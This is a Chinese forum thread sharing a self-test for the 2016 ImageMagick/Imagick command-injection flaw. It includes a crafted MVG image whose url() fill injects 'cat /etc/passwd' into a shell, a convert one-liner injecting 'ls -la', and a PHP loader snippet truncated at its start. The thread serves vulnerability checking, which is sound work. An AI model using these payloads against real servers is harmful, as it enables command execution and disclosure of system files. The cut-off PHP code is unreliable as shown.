ImageMagick php扩展漏洞测试代码

funders

test.php

[ol]

thumbnailImage(50, 0);

//echo $image;

$image->writeImage("newwww.png");

?>[/ol]复制代码

test.png

[ol]

push graphic-context

viewbox 0 0 640 480

fill 'url(https://example.com/image.jpg"|cat /etc/passwd > /tmp/fucked")'

pop graphic-context[/ol]复制代码

bash下执行

[ol]

php test.php test.png

ls -l /tmp

[/ol]复制代码

如果/tmp下多了一个fucked(里面是passwd内容)，说明服务器存在漏洞。
如果没有这个文件，或者php报错没有Imagick这个类说明服务器没装ImageMagick扩展，对你没有影响。

昨天测试debian7用这条命令安装的lnmp是存在漏洞的
[ol]

apt-get install nginx mysql-server php5-fpm php5-curl php5-gd php5-intl php-pear php5-imagick php5-imap php5-mcrypt php5-common php5-mysql php5-pspell php5-recode php5-snmp php5-sqlite php5-tidy php5-xmlrpc php5-xsl php5-memcached memcached[/ol]复制代码

昨天看还没有补丁。

如果存在这个漏洞 别人上传上面的假图片，php只要调用Imagick（）就会有这个漏洞。

好了 你们看看吧。

我的迪奥不是你装B的资本～

gger

刚看到服务器之家也分享了

gmal

我的迪奥不是你装B的资本～

danwant

convert 'https://example.com"|ls "-la' out.png  这个应该也能检测吧
我在AMH论坛看到的
漏洞验证方法：
若系统中安装使用了ImageMagick，本地执行如下命令：
convert 'https://example.com"|ls "-la' out.png
若ls -la 命令成功执行，说明存在漏洞。未执行ls 命令，并报错，说明不受影响。

funders

danwant 发表于 2016-5-6 15:11

convert 'https://example.com"|ls "-la' out.png  这个应该也能检测吧
我在AMH论坛看到的
漏洞验证方法：
这个是软件，我发的是php扩展。你可能装了扩展而没装软件

domin

phpinfo里应该可以看到有没有安装吧

funders

domin 发表于 2016-5-6 15:23

phpinfo里应该可以看到有没有安装吧
可以  imagick搜这个

sunday

funders 发表于 2016-5-6 15:25

可以  imagick搜这个




谢谢，看了下自己的，没有安装imagemagick

dollaring

有没有批量检测工具呀

Ruclinuxbigexiu

find / -name ImageMagick
没找到是不是代表没有安装这个组件?linux 不用装杀毒软件 都是骗人的营销虚头。。。一直在受骗。为啥不自己设计一套中文的硬软一体机器。
想想都有成就感，再想想还是睡吧。